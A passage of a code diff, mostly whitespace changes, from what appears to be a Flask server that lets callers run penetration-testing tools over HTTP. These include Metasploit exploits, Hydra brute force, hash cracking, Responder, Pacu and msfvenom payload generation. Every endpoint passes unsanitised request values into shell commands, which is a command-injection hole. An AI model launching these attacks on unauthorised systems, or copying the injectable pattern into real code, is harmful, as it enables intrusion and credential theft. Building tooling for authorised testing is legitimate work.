is required" }), 400 - + command = f"nuclei -u {target}" - + if severity: command += f" -severity {severity}" - + if tags: command += f" -tags {tags}" - + if template: command += f" -t {template}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ฌ Starting Nuclei vulnerability scan: {target}") - + # Use intelligent error handling if enabled if use_recovery: tool_params = { @@ -8603,10 +8603,10 @@ def nuclei(): result = execute_command_with_recovery("nuclei", command, tool_params) else: result = execute_command(command) - + logger.info(f"๐Ÿ“Š Nuclei scan completed for {target}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in nuclei endpoint: {str(e)}") return jsonify({ @@ -8629,27 +8629,27 @@ def prowler(): output_dir = params.get("output_dir", "/tmp/prowler_output") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + # Ensure output directory exists Path(output_dir).mkdir(parents=True, exist_ok=True) - + command = f"prowler {provider}" - + if profile: command += f" --profile {profile}" - + if region: command += f" --region {region}" - + if checks: command += f" --checks {checks}" - + command += f" --output-directory {output_dir}" command += f" --output-format {output_format}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting Prowler {provider} security assessment") result = execute_command(command) result["output_directory"] = output_dir @@ -8672,27 +8672,27 @@ def trivy(): severity = params.get("severity", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Trivy called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"trivy {scan_type} {target}" - + if output_format: command += f" --format {output_format}" - + if severity: command += f" --severity {severity}" - + if output_file: command += f" --output {output_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Trivy {scan_type} scan: {target}") result = execute_command(command) if output_file: @@ -8720,26 +8720,26 @@ def scout_suite(): services = params.get("services", "") exceptions = params.get("exceptions", "") additional_args = params.get("additional_args", "") - + # Ensure report directory exists Path(report_dir).mkdir(parents=True, exist_ok=True) - + command = f"scout {provider}" - + if profile and provider == "aws": command += f" --profile {profile}" - + if services: command += f" --services {services}" - + if exceptions: command += f" --exceptions {exceptions}" - + command += f" --report-dir {report_dir}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting Scout Suite {provider} assessment") result = execute_command(command) result["report_directory"] = report_dir @@ -8758,22 +8758,22 @@ def cloudmapper(): account = params.get("account", "") config = params.get("config", "config.json") additional_args = params.get("additional_args", "") - + if not account and action != "webserver": logger.warning("โ˜๏ธ CloudMapper called without account parameter") return jsonify({"error": "Account parameter is required for most actions"}), 400 - + command = f"cloudmapper {action}" - + if account: command += f" --account {account}" - + if config: command += f" --config {config}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting CloudMapper {action}") result = execute_command(command) logger.info(f"๐Ÿ“Š CloudMapper {action} completed") @@ -8792,42 +8792,42 @@ def pacu(): data_services = params.get("data_services", "") regions = params.get("regions", "") additional_args = params.get("additional_args", "") - + # Create Pacu command sequence commands = [] commands.append(f"set_session {session_name}") - + if data_services: commands.append(f"data {data_services}") - + if regions: commands.append(f"set_regions {regions}") - + if modules: for module in modules.split(","): commands.append(f"run {module.strip()}") - + commands.append("exit") - + # Create command file command_file = "/tmp/pacu_commands.txt" with open(command_file, "w") as f: f.write("\n".join(commands)) - + command = f"pacu < {command_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting Pacu AWS exploitation") result = execute_command(command) - + # Cleanup try: os.remove(command_file) except: pass - + logger.info(f"๐Ÿ“Š Pacu exploitation completed") return jsonify(result) except Exception as e: @@ -8846,9 +8846,9 @@ def kube_hunter(): active = params.get("active", False) report = params.get("report", "json") additional_args = params.get("additional_args", "") - + command = "kube-hunter" - + if target: command += f" --remote {target}" elif remote: @@ -8860,16 +8860,16 @@ def kube_hunter(): else: # Default to pod scanning command += " --pod" - + if active: command += " --active" - + if report: command += f" --report {report}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting kube-hunter Kubernetes scan") result = execute_command(command) logger.info(f"๐Ÿ“Š kube-hunter scan completed") @@ -8888,24 +8888,24 @@ def kube_bench(): config_dir = params.get("config_dir", "") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + command = "kube-bench" - + if targets: command += f" --targets {targets}" - + if version: command += f" --version {version}" - + if config_dir: command += f" --config-dir {config_dir}" - + if output_format: command += f" --outputfile /tmp/kube-bench-results.{output_format} --json" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting kube-bench CIS benchmark") result = execute_command(command) logger.info(f"๐Ÿ“Š kube-bench benchmark completed") @@ -8923,21 +8923,21 @@ def docker_bench_security(): exclude = params.get("exclude", "") # Checks to exclude output_file = params.get("output_file", "/tmp/docker-bench-results.json") additional_args = params.get("additional_args", "") - + command = "docker-bench-security" - + if checks: command += f" -c {checks}" - + if exclude: command += f" -e {exclude}" - + if output_file: command += f" -l {output_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿณ Starting Docker Bench Security assessment") result = execute_command(command) result["output_file"] = output_file @@ -8956,23 +8956,23 @@ def clair(): config = params.get("config", "/etc/clair/config.yaml") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + if not image: logger.warning("๐Ÿณ Clair called without image parameter") return jsonify({"error": "Image parameter is required"}), 400 - + # Use clairctl for scanning command = f"clairctl analyze {image}" - + if config: command += f" --config {config}" - + if output_format: command += f" --format {output_format}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿณ Starting Clair vulnerability scan: {image}") result = execute_command(command) logger.info(f"๐Ÿ“Š Clair scan completed for {image}") @@ -8991,21 +8991,21 @@ def falco(): output_format = params.get("output_format", "json") duration = params.get("duration", 60) # seconds additional_args = params.get("additional_args", "") - + command = f"timeout {duration} falco" - + if config_file: command += f" --config {config_file}" - + if rules_file: command += f" --rules {rules_file}" - + if output_format == "json": command += " --json" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ›ก๏ธ Starting Falco runtime monitoring for {duration}s") result = execute_command(command) logger.info(f"๐Ÿ“Š Falco monitoring completed") @@ -9025,24 +9025,24 @@ def checkov(): skip_check = params.get("skip_check", "") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + command = f"checkov -d {directory}" - + if framework: command += f" --framework {framework}" - + if check: command += f" --check {check}" - + if skip_check: command += f" --skip-check {skip_check}" - + if output_format: command += f" --output {output_format}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Checkov IaC scan: {directory}") result = execute_command(command) logger.info(f"๐Ÿ“Š Checkov scan completed") @@ -9062,21 +9062,21 @@ def terrascan(): output_format = params.get("output_format", "json") severity = params.get("severity", "") additional_args = params.get("additional_args", "") - + command = f"terrascan scan -t {scan_type} -d {iac_dir}" - + if policy_type: command += f" -p {policy_type}" - + if output_format: command += f" -o {output_format}" - + if severity: command += f" --severity {severity}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Terrascan IaC scan: {iac_dir}") result = execute_command(command) logger.info(f"๐Ÿ“Š Terrascan scan completed") @@ -9093,18 +9093,18 @@ def dirb(): url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Dirb called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"dirb {url} {wordlist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ Starting Dirb scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Dirb scan completed for {url}") @@ -9122,18 +9122,18 @@ def nikto(): params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Nikto called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nikto -h {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ฌ Starting Nikto scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Nikto scan completed for {target}") @@ -9152,21 +9152,21 @@ def sqlmap(): url = params.get("url", "") data = params.get("data", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŽฏ SQLMap called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"sqlmap -u {url} --batch" - + if data: command += f" --data=\"{data}\"" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ’‰ Starting SQLMap scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š SQLMap scan completed for {url}") @@ -9184,35 +9184,35 @@ def metasploit(): params = request.json module = params.get("module", "") options = params.get("options", {}) - + if not module: logger.warning("๐Ÿš€ Metasploit called without module parameter") return jsonify({ "error": "Module parameter is required" }), 400 - + # Create an MSF resource script resource_content = f"use {module}\n" for key, value in options.items(): resource_content += f"set {key} {value}\n" resource_content += "exploit\n" - + # Save resource script to a temporary file resource_file = "/tmp/mcp_msf_resource.rc" with open(resource_file, "w") as f: f.write(resource_content) - + command = f"msfconsole -q -r {resource_file}" - + logger.info(f"๐Ÿš€ Starting Metasploit module: {module}") result = execute_command(command) - + # Clean up the temporary file try: os.remove(resource_file) except Exception as e: logger.warning(f"Error removing temporary resource file: {str(e)}") - + logger.info(f"๐Ÿ“Š Metasploit module completed: {module}") return jsonify(result) except Exception as e: @@ -9233,36 +9233,36 @@ def hydra(): password = params.get("password", "") password_file = params.get("password_file", "") additional_args = params.get("additional_args", "") - + if not target or not service: logger.warning("๐ŸŽฏ Hydra called without target or service parameter") return jsonify({ "error": "Target and service parameters are required" }), 400 - + if not (username or username_file) or not (password or password_file): logger.warning("๐Ÿ”‘ Hydra called without username/password parameters") return jsonify({ "error": "Username/username_file and password/password_file are required" }), 400 - + command = f"hydra -t 4" - + if username: command += f" -l {username}" elif username_file: command += f" -L {username_file}" - + if password: command += f" -p {password}" elif password_file: command += f" -P {password_file}" - + if additional_args: command += f" {additional_args}" - + command += f" {target} {service}" - + logger.info(f"๐Ÿ”‘ Starting Hydra attack: {target}:{service}") result = execute_command(command) logger.info(f"๐Ÿ“Š Hydra attack completed for {target}") @@ -9282,26 +9282,26 @@ def john(): wordlist = params.get("wordlist", "/usr/share/wordlists/rockyou.txt") format_type = params.get("format", "") additional_args = params.get("additional_args", "") - + if not hash_file: logger.warning("๐Ÿ” John called without hash_file parameter") return jsonify({ "error": "Hash file parameter is required" }), 400 - + command = f"john" - + if format_type: command += f" --format={format_type}" - + if wordlist: command += f" --wordlist={wordlist}" - + if additional_args: command += f" {additional_args}" - + command += f" {hash_file}" - + logger.info(f"๐Ÿ” Starting John the Ripper: {hash_file}") result = execute_command(command) logger.info(f"๐Ÿ“Š John the Ripper completed") @@ -9319,18 +9319,18 @@ def wpscan(): params = request.json url = params.get("url", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ WPScan called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"wpscan --url {url}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting WPScan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š WPScan completed for {url}") @@ -9348,15 +9348,15 @@ def enum4linux(): params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "-a") - + if not target: logger.warning("๐ŸŽฏ Enum4linux called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"enum4linux {additional_args} {target}" - + logger.info(f"๐Ÿ” Starting Enum4linux: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Enum4linux completed for {target}") @@ -9377,15 +9377,15 @@ def ffuf(): mode = params.get("mode", "directory") match_codes = params.get("match_codes", "200,204,301,302,307,401,403") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ FFuf called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"ffuf" - + if mode == "directory": command += f" -u {url}/FUZZ -w {wordlist}" elif mode == "vhost": @@ -9394,12 +9394,12 @@ def ffuf(): command += f" -u {url}?FUZZ=value -w {wordlist}" else: command += f" -u {url} -w {wordlist}" - + command += f" -mc {match_codes}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting FFuf {mode} fuzzing: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š FFuf fuzzing completed for {url}") @@ -9422,30 +9422,30 @@ def netexec(): hash_value = params.get("hash", "") module = params.get("module", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ NetExec called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nxc {protocol} {target}" - + if username: command += f" -u {username}" - + if password: command += f" -p {password}" - + if hash_value: command += f" -H {hash_value}" - + if module: command += f" -M {module}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting NetExec {protocol} scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š NetExec scan completed for {target}") @@ -9464,23 +9464,23 @@ def amass(): domain = params.get("domain", "") mode = params.get("mode", "enum") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Amass called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"amass {mode}" - + if mode == "enum": command += f" -d {domain}" else: command += f" -d {domain}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Amass {mode}: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Amass completed for {domain}") @@ -9502,29 +9502,29 @@ def hashcat(): wordlist = params.get("wordlist", "/usr/share/wordlists/rockyou.txt") mask = params.get("mask", "") additional_args = params.get("additional_args", "") - + if not hash_file: logger.warning("๐Ÿ” Hashcat called without hash_file parameter") return jsonify({ "error": "Hash file parameter is required" }), 400 - + if not hash_type: logger.warning("๐Ÿ” Hashcat called without hash_type parameter") return jsonify({ "error": "Hash type parameter is required" }), 400 - + command = f"hashcat -m {hash_type} -a {attack_mode} {hash_file}" - + if attack_mode == "0" and wordlist: command += f" {wordlist}" elif attack_mode == "3" and mask: command += f" {mask}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Hashcat attack: mode {attack_mode}") result = execute_command(command) logger.info(f"๐Ÿ“Š Hashcat attack completed") @@ -9544,24 +9544,24 @@ def subfinder(): silent = params.get("silent", True) all_sources = params.get("all_sources", False) additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Subfinder called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"subfinder -d {domain}" - + if silent: command += " -silent" - + if all_sources: command += " -all" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Subfinder: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Subfinder completed for {domain}") @@ -9582,27 +9582,27 @@ def smbmap(): password = params.get("password", "") domain = params.get("domain", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ SMBMap called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"smbmap -H {target}" - + if username: command += f" -u {username}" - + if password: command += f" -p {password}" - + if domain: command += f" -d {domain}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting SMBMap: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š SMBMap completed for {target}") @@ -9629,22 +9629,22 @@ def rustscan(): timeout = params.get("timeout", 1500) scripts = params.get("scripts", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Rustscan called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"rustscan -a {target} --ulimit {ulimit} -b {batch_size} -t {timeout}" - + if ports: command += f" -p {ports}" - + if scripts: command += f" -- -sC -sV" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โšก Starting Rustscan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Rustscan completed for {target}") @@ -9666,28 +9666,28 @@ def masscan(): source_ip = params.get("source_ip", "") banners = params.get("banners", False) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Masscan called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"masscan {target} -p{ports} --rate={rate}" - + if interface: command += f" -e {interface}" - + if router_mac: command += f" --router-mac {router_mac}" - + if source_ip: command += f" --source-ip {source_ip}" - + if banners: command += " --banners" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿš€ Starting Masscan: {target} at rate {rate}") result = execute_command(command) logger.info(f"๐Ÿ“Š Masscan completed for {target}") @@ -9711,38 +9711,38 @@ def nmap_advanced(): aggressive = params.get("aggressive", False) stealth = params.get("stealth", False) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Advanced Nmap called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"nmap {scan_type} {target}" - + if ports: command += f" -p {ports}" - + if stealth: command += " -T2 -f --mtu 24" else: command += f" -{timing}" - + if os_detection: command += " -O" - + if version_detection: command += " -sV" - + if aggressive: command += " -A" - + if nse_scripts: command += f" --script={nse_scripts}" elif not aggressive: # Default useful scripts if not aggressive command += " --script=default,discovery,safe" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Advanced Nmap: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Advanced Nmap completed for {target}") @@ -9763,22 +9763,22 @@ def autorecon(): heartbeat = params.get("heartbeat", 60) timeout = params.get("timeout", 300) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ AutoRecon called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"autorecon {target} -o {output_dir} --heartbeat {heartbeat} --timeout {timeout}" - + if port_scans != "default": command += f" --port-scans {port_scans}" - + if service_scans != "default": command += f" --service-scans {service_scans}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”„ Starting AutoRecon: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š AutoRecon completed for {target}") @@ -9801,22 +9801,22 @@ def enum4linux_ng(): groups = params.get("groups", True) policy = params.get("policy", True) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Enum4linux-ng called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"enum4linux-ng {target}" - + if username: command += f" -u {username}" - + if password: command += f" -p {password}" - + if domain: command += f" -d {domain}" - + # Add specific enumeration options enum_options = [] if shares: @@ -9827,13 +9827,13 @@ def enum4linux_ng(): enum_options.append("G") if policy: enum_options.append("P") - + if enum_options: command += f" -A {','.join(enum_options)}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Enum4linux-ng: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Enum4linux-ng completed for {target}") @@ -9853,11 +9853,11 @@ def rpcclient(): domain = params.get("domain", "") commands = params.get("commands", "enumdomusers;enumdomgroups;querydominfo") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ rpcclient called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + # Build authentication string auth_string = "" if username and password: @@ -9866,18 +9866,18 @@ def rpcclient(): auth_string = f"-U {username}" else: auth_string = "-U ''" # Anonymous - + if domain: auth_string += f" -W {domain}" - + # Create command sequence command_sequence = commands.replace(";", "\n") - + command = f"echo -e '{command_sequence}' | rpcclient {auth_string} {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting rpcclient: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š rpcclient completed for {target}") @@ -9895,21 +9895,21 @@ def nbtscan(): verbose = params.get("verbose", False) timeout = params.get("timeout", 2) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ nbtscan called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"nbtscan -t {timeout}" - + if verbose: command += " -v" - + command += f" {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting nbtscan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š nbtscan completed for {target}") @@ -9929,24 +9929,24 @@ def arp_scan(): timeout = params.get("timeout", 500) retry = params.get("retry", 3) additional_args = params.get("additional_args", "") - + if not target and not local_network: logger.warning("๐ŸŽฏ arp-scan called without target parameter") return jsonify({"error": "Target parameter or local_network flag is required"}), 400 - + command = f"arp-scan -t {timeout} -r {retry}" - + if interface: command += f" -I {interface}" - + if local_network: command += " -l" else: command += f" {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting arp-scan: {target if target else 'local network'}") result = execute_command(command) logger.info(f"๐Ÿ“Š arp-scan completed") @@ -9967,28 +9967,28 @@ def responder(): fingerprint = params.get("fingerprint", False) duration = params.get("duration", 300) # 5 minutes default additional_args = params.get("additional_args", "") - + if not interface: logger.warning("๐ŸŽฏ Responder called without interface parameter") return jsonify({"error": "Interface parameter is required"}), 400 - + command = f"timeout {duration} responder -I {interface}" - + if analyze: command += " -A" - + if wpad: command += " -w" - + if force_wpad_auth: command += " -F" - + if fingerprint: command += " -f" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Responder on interface: {interface}") result = execute_command(command) logger.info(f"๐Ÿ“Š Responder completed") @@ -10006,29 +10006,29 @@ def volatility(): plugin = params.get("plugin", "") profile = params.get("profile", "") additional_args = params.get("additional_args", "") - + if not memory_file: logger.warning("๐Ÿง  Volatility called without memory_file parameter") return jsonify({ "error": "Memory file parameter is required" }), 400 - + if not plugin: logger.warning("๐Ÿง  Volatility called without plugin parameter") return jsonify({ "error": "Plugin parameter is required" }), 400 - + command = f"volatility -f {memory_file}" - + if profile: command += f" --profile={profile}" - + command += f" {plugin}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿง  Starting Volatility analysis: {plugin}") result = execute_command(command) logger.info(f"๐Ÿ“Š Volatility analysis completed") @@ -10050,30 +10050,30 @@ def msfvenom(): encoder = params.get("encoder", "") iterations = params.get("iterations", "") additional_args = params.get("additional_args", "") - + if not payload: logger.warning("๐Ÿš€ MSFVenom called without payload parameter") return jsonify({ "error": "Payload parameter is required" }), 400 - + command = f"msfvenom -p {payload}" - + if format_type: command += f" -f {format_type}" - + if output_file: command += f" -o {output_file}" - + if encoder: command += f" -e {encoder}" - + if iterations: command += f" -i {iterations}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿš€ Starting MSFVenom payload generation: {payload}") result = execute_command(command) logger.info(f"๐Ÿ“Š MSFVenom payload generated") @@ -10097,38 +10097,38 @@ def gdb(): commands = params.get("commands", "") script_file = params.get("script_file", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง GDB called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"gdb {binary}" - + if script_file: command += f" -x {script_file}" - + if commands: temp_script = "/tmp/gdb_commands.txt" with open(temp_script, "w") as f: f.write(commands) command += f" -x {temp_script}" - + if additional_args: command += f" {additional_args}" - + command += " -batch" - + logger.info(f"๐Ÿ”ง Starting GDB analysis: {binary}") result = execute_command(command) - + if commands and os.path.exists("/tmp/gdb_commands.txt"): try: os.remove("/tmp/gdb_commands.txt") except: pass - + logger.info(f"๐Ÿ“Š GDB analysis completed for {binary}") return jsonify(result) except Exception as e: @@ -10145,13 +10145,13 @@ def radare2(): binary = params.get("binary", "") commands = params.get("commands", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง Radare2 called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + if commands: temp_script = "/tmp/r2_commands.txt" with open(temp_script, "w") as f: @@ -10159,19 +10159,19 @@ def radare2(): command = f"r2 -i {temp_script} -q {binary}" else: command = f"r2 -q {binary}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting Radare2 analysis: {binary}") result = execute_command(command) - + if commands and os.path.exists("/tmp/r2_commands.txt"): try: os.remove("/tmp/r2_commands.txt") except: pass - + logger.info(f"๐Ÿ“Š Radare2 analysis completed for {binary}") return jsonify(result) except Exception as e: @@ -10188,23 +10188,23 @@ def binwalk(): file_path = params.get("file_path", "") extract = params.get("extract", False) additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ”ง Binwalk called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"binwalk" - + if extract: command += " -e" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ”ง Starting Binwalk analysis: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š Binwalk analysis completed for {file_path}") @@ -10223,21 +10223,21 @@ def ropgadget(): binary = params.get("binary", "") gadget_type = params.get("gadget_type", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง ROPgadget called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"ROPgadget --binary {binary}" - + if gadget_type: command += f" --only '{gadget_type}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting ROPgadget search: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š ROPgadget search completed for {binary}") @@ -10254,15 +10254,15 @@ def checksec(): try: params = request.json binary = params.get("binary", "") - + if not binary: logger.warning("๐Ÿ”ง Checksec called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"checksec --file={binary}" - + logger.info(f"๐Ÿ”ง Starting Checksec analysis: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š Checksec analysis completed for {binary}") @@ -10282,23 +10282,23 @@ def xxd(): offset = params.get("offset", "0") length = params.get("length", "") additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ”ง XXD called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"xxd -s {offset}" - + if length: command += f" -l {length}" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ”ง Starting XXD hex dump: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š XXD hex dump completed for {file_path}") @@ -10317,20 +10317,20 @@ def strings(): file_path = params.get("file_path", "") min_len = params.get("min_len", 4) additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ”ง Strings called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"strings -n {min_len}" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ”ง Starting Strings extraction: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š Strings extraction completed for {file_path}") @@ -10349,25 +10349,25 @@ def objdump(): binary = params.get("binary", "") disassemble = params.get("disassemble", True) additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง Objdump called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"objdump" - + if disassemble: command += " -d" else: command += " -x" - + if additional_args: command += f" {additional_args}" - + command += f" {binary}" - + logger.info(f"๐Ÿ”ง Starting Objdump analysis: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š Objdump analysis completed for {binary}") @@ -10393,27 +10393,27 @@ def ghidra(): analysis_timeout = params.get("analysis_timeout", 300) output_format = params.get("output_format", "xml") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง Ghidra called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + # Create Ghidra project directory project_dir = f"/tmp/ghidra_projects/{project_name}" os.makedirs(project_dir, exist_ok=True) - + # Base Ghidra command for headless analysis command = f"analyzeHeadless {project_dir} {project_name} -import {binary} -deleteProject" - + if script_file: command += f" -postScript {script_file}" - + if output_format == "xml": command += f" -postScript ExportXml.java {project_dir}/analysis.xml" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting Ghidra analysis: {binary}") result = execute_command(command, timeout=analysis_timeout) logger.info(f"๐Ÿ“Š Ghidra analysis completed for {binary}") @@ -10433,14 +10433,14 @@ def pwntools(): target_port = params.get("target_port", 0) exploit_type = params.get("exploit_type", "local") # local, remote, format_string, rop additional_args = params.get("additional_args", "") - + if not script_content and not target_binary: logger.warning("๐Ÿ”ง Pwntools called without script content or target binary") return jsonify({"error": "Script content or target binary is required"}), 400 - + # Create temporary Python script script_file = "/tmp/pwntools_exploit.py" - + if script_content: # Use provided script content with open(script_file, "w") as f: @@ -10476,21 +10476,21 @@ p.interactive() """ with open(script_file, "w") as f: f.write(template) - + command = f"python3 {script_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting Pwntools exploit: {exploit_type}") result = execute_command(command) - + # Cleanup try: os.remove(script_file) except: pass - + logger.info(f"๐Ÿ“Š Pwntools exploit completed") return jsonify(result) except Exception as e: @@ -10505,16 +10505,16 @@ def one_gadget(): libc_path = params.get("libc_path", "") level = params.get("level", 1) # 0, 1, 2 for different constraint levels additional_args = params.get("additional_args", "") - + if not libc_path: logger.warning("๐Ÿ”ง one_gadget called without libc_path parameter") return jsonify({"error": "libc_path parameter is required"}), 400 - + command = f"one_gadget {libc_path} --level {level}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting one_gadget analysis: {libc_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š one_gadget analysis completed") @@ -10532,18 +10532,18 @@ def libc_database(): symbols = params.get("symbols", "") # format: "symbol1:offset1 symbol2:offset2" libc_id = params.get("libc_id", "") additional_args = params.get("additional_args", "") - + if action == "find" and not symbols: logger.warning("๐Ÿ”ง libc-database find called without symbols") return jsonify({"error": "Symbols parameter is required for find action"}), 400 - + if action in ["dump", "download"] and not libc_id: logger.warning("๐Ÿ”ง libc-database called without libc_id for dump/download") return jsonify({"error": "libc_id parameter is required for dump/download actions"}), 400 - + # Navigate to libc-database directory (assuming it's installed) base_command = "cd 